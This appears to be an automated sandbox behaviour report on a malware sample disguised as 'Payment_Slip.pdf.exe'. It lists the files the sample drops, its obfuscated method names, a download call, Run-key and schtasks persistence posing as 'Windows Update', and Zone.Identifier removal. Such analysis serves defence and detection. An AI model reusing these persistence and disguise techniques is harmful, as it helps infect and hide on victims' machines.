Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D3D41 push ebp; retn 0006h 12_2_007D3D42
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D3DE1 push esi; retn 0006h 12_2_007D3DE2
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D3D81 push ebp; retn 0006h 12_2_007D3D82
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D3E78 push esi; retn 0006h 12_2_007D3E7A
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_067FB943 push es; ret 12_2_067FB950
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_068377B4 push es; ret 12_2_068377C0
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_068377DC push es; ret 12_2_068377C0
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C35348 push edi; ret 12_2_06C35702
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C3CF20 push 9806C22Ah; retf 12_2_06C3CF25
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C3B248 push ss; retn 0006h 12_2_06C3B24A
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C3A3A8 push cs; retn 0006h 12_2_06C3A3AA
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_05B28BEF push edi; retn 0000h 13_2_05B28BF1
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_0682F7D8 push eax; retn 0683h 13_2_0682F999
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06827638 push esp; ret 13_2_06827685
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06824085 push 8B000003h; iretd 13_2_0682408C
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A9BE78 push eax; ret 13_2_06A9BE79
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A90B33 push eax; iretd 13_2_06A90B39
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_06A948E1 push 7806AC64h; ret 13_2_06A948ED
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044693D push ecx; ret 14_2_0044694D
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044DB70 push eax; ret 14_2_0044DB84
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0044DB70 push eax; ret 14_2_0044DBAC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00451D54 push eax; ret 14_2_00451D61
Source: Payment_Slip.pdf.exe Static PE information: section name: .text entropy: 7.92864214342551
Source: mHTmhPhJy.exe.0.dr Static PE information: section name: .text entropy: 7.92864214342551
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, y6YcC1IOBotyQaRh6iv.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UGqmJ8MBqD', 'wN4mQBplev', 'eibmxS6tNg', 'nEbmY9m5u9', 'cKpm1IjB4r', 'fvfmM2w59Q', 'kUWmFBbCUp'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkUSwEDOYAt7lMcOwY.cs High entropy of concatenated method names: 'NRA8pUUdsa', 'Aw68vN7LDN', 'KDM8neba9o', 'xeT8Dtl9Y1', 'UX687G7tUB', 'LsP85USCFS', 'OdF8gj36Yo', 'bOr8G9JObC', 'u278RGPWqT', 'A2j8mY130i'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, yKfW5T3tGnC6kmUxYP.cs High entropy of concatenated method names: 'XkvIj6t4op', 'bAoIe1Qtrx', 'COYITAt7lM', 'eOwIVYkAlm', 'IEFI7Ru15P', 'pZ5I5j5SaK', 'hdjSCBE87qxDviTt4R', 'x8QjfLcT4dJ3jgHCOK', 'hOkIIP0PWs', 'vHsIyAx3kT'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, KRVs7iYj6yPbNKa0Yl.cs High entropy of concatenated method names: 'rvC7bRxxO5', 'aYm7QEVGFS', 'oZU7YqDDGA', 'De3713rDtB', 'hFK7oLwpSy', 'jNY7UqLH7i', 'uyG7Bbiq90', 'dlx7sFbbJD', 'irp7iO4JBc', 'cR47AM11Ke'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, tqpMvgxuTt3IAmVCrg.cs High entropy of concatenated method names: 'mdfZnqQ9eo', 'r4nZDfEQbn', 'NM2Z0jxft6', 'MQqZoCJ597', 'FXVZBCOn8D', 'GwAZsP1aKJ', 'zvuZA8rWfc', 'XaWZSqqNGP', 'GAPZbYdVwt', 'KfZZJkRVHi'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, Gk9PdaMAVGGLVrsCuI.cs High entropy of concatenated method names: 'ToString', 'GBx5J3M3FH', 'y4g5ojIYbK', 'pOZ5Ue8nt0', 'ojx5BVZ8nf', 'mRe5sMisqQ', 'lip5iIkXTo', 'A9f5A3HKdF', 'IkI5S0Mn86', 'Rqd5HDRLNk'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, mL1yOx2rBFYlGxdGQM.cs High entropy of concatenated method names: 'eWjK6wMy8', 'BRZpmaJir', 'GAhv5Syb9', 'YdiE7VJiA', 'YCtD1RUOZ', 'h0whLHPGf', 'd81F6u1bwc0SAnwWb1', 'lnfZjLGrwRr5QTfwox', 'jxSGX1WmW', 'EF4mHcA6U'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, jU3mqX4JiC8fXaRuWG.cs High entropy of concatenated method names: 'oq3m8GhS2N', 'y8bmfylHu8', 'c84mtrInDC', 'JGEmjYGwsu', 'zOMmRWJOCN', 'OkymepOUDF', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, bJtGO9II6JaEOek5Jqh.cs High entropy of concatenated method names: 'q7um4o7aYo', 'BZomzrx2gO', 'YSqNOkrbVB', 'HwKNI7bGlc', 'DC1N2SnMOO', 'PZANy41hP3', 'bcsN3Kb0Nx', 'Ea1Ncu2SUS', 'TUeNwe8cwW', 'oFTNPPlQfa'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, WAlmw8hg1iD9JBEFRu.cs High entropy of concatenated method names: 'xiHf6olSRJ', 'IU5fEET5PG', 'WIM8UKvhB8', 'DRr8BONLdy', 'glm8sMFPeg', 'yRX8iqtX05', 'OI18A7rDtE', 'KS78SAjU6a', 'WVi8Hltphl', 'CBd8bOvTCa'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs High entropy of concatenated method names: 'cCVyc3lRiN', 'zTeywke01j', 'SBsyPGRBgf', 'wQhy8FpRGx', 'wO8yfLtUGT', 'oOZytcyA9G', 'UgFyjCmHVA', 'f7kyem263L', 'kqwydB6Lup', 'hQhyT0iZMy'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, nINbxJCQ3XxrE7Js03.cs High entropy of concatenated method names: 'BGqgWDwfC8', 'cStg4fumVv', 'if7GOqEG1O', 'G6CGIJENII', 'nbygJmdS3Z', 'nWogQEfY5R', 'Ix9gxcgPT6', 'oXcgYasOpV', 'HA5g16Oi35', 'TnVgMny3g6'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, Vex4ilFu8A9XAL3nwL.cs High entropy of concatenated method names: 'zOmgTGZimL', 'CB5gVgMSKh', 'ToString', 'X5Dgwj0tdk', 'jOZgPNwHFj', 'TlOg82CcIV', 'blogfLMNpv', 'XBFgtM8VnN', 'igAgjdDh3i', 'ichgexJKcY'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, MSJvbOHcHTO0c3bCdq.cs High entropy of concatenated method names: 'QO4jaretvn', 'jMGjqD98Of', 'MpbjKbm1Rc', 'V3wjp8uKh1', 'fKnj655umG', 'JthjvX3Vf4', 'p0WjEW0Eas', 'b51jnrqRVF', 'XG5jD3h7yy', 'UGqjhu5bfc'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, B6t4opnIAo1QtrxVaa.cs High entropy of concatenated method names: 'Ad8PYPNMSv', 'CJYP1UHGGf', 'MxcPM8bIAF', 'Y5yPFucZwN', 'E5QPlSIsoa', 'j9yPCnEMsh', 'mIlPk8F5LR', 'DC5PWDZvKJ', 'z5SPLb8Jay', 'vR9P413nj9'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, QnXqhezuvN7cIpValM.cs High entropy of concatenated method names: 'VlmmvXcQ5J', 'bAgmn9TmV9', 'IPZmDB51I7', 'OpGm08dtIS', 'AFamo7xICr', 'kokmBOL1h1', 'nI8msjCjni', 'PGPmXO928N', 'VW2masbI4o', 'hjSmqeHVg8'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, ijY91ePT8UGDHEvgSe.cs High entropy of concatenated method names: 'Dispose', 'v09ILg28Zp', 'RV02oNpKhO', 'TRM936xQoU', 'QnFI4Wp73l', 'TO7Iz7rI6g', 'ProcessDialogKey', 'toV2Onr9uJ', 'dfK2IUumCA', 'B0M22tU3mq'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, NSam4kI3GhkqpuZJciv.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'j6LuRxG8ip', 'lrXummPSHO', 'ssFuN73QJn', 'Q5iuuZE0AL', 'VnLursiNC9', 'Q3Tu9GtmGB', 'gCpuXGVGeS'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, sBkofI8Vdfu7QC8btk.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cUm2LD7Rw5', 'i7b24pnTml', 'TTY2zK2dBK', 'u65yO0V4ia', 'Qs0yIbfPJj', 'xCqy2DrlnM', 'GdyyymARuD', 'RGITeyIoAWrcZ2DHY7i'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, o5Pu5QAYgvExHeVGbP.cs High entropy of concatenated method names: 'sWujw0pgrG', 'IdQj87lcB5', 'tVQjtDbXco', 'trat4eKBas', 'YLOtzXryjL', 'xrCjOtjNaQ', 'N8njI3u1I7', 'fd9j2eq6AF', 'LKTjycG0Yp', 'Fklj3ih7UU'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, fynTdqk87r09g28Zpx.cs High entropy of concatenated method names: 'XTqR7hVKJk', 'XiIRgU5848', 'D0VRRlrsZy', 'hF1RNqP4Ss', 'DepRrP3r2G', 'hr7RXgJvTJ', 'Dispose', 'lOcGwuiNT4', 'UctGP4gmkm', 'ChbG86Y8AZ'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, R5P5Z50j5SaKrgriEl.cs High entropy of concatenated method names: 'tlBtccHd4u', 'gL1tPfkvy3', 'SaKtffOlhm', 'jWvtjx9upP', 'TwxteyCRXA', 'IX2fljlhWy', 'Ft9fCHLZEO', 'oj8fkTSsOI', 'Qw9fWnDQ2a', 'eBMfLMSCUL'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, mnr9uJLyfKUumCAv0M.cs High entropy of concatenated method names: 'Y44R0aga1H', 'BjNRonM0LP', 'KMBRUBPGSD', 'J2wRBLoiwq', 'haSRsgNLrL', 'IKIRiKA5bX', 'UYwRARp4Pg', 'bpxRSudZcd', 'tMuRHnHE7J', 'sTZRbO6R0o'
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004063C6 ShellExecuteW,URLDownloadToFileW, 11_2_004063C6
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File created: C:\Users\user\AppData\Local\Temp\dwn.exe
Source: C:\Users\user\AppData\Local\Temp\conserver.exe File created: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File created: C:\Users\user\AppData\Roaming\host.exe
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe
Source: C:\Users\user\AppData\Roaming\host.exe File created: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File created: C:\Users\user\AppData\Local\Temp\conserver.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\conserver.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Update
Source: C:\Users\user\AppData\Roaming\host.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mykksg
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp"
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 11_2_00418A00

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Roaming\host.exe File opened: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\conserver.exe File opened: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: Possible double extension: pdf.exe Static PE information: Payment_Slip.pdf.exe
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 11_2_0041A8DA
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
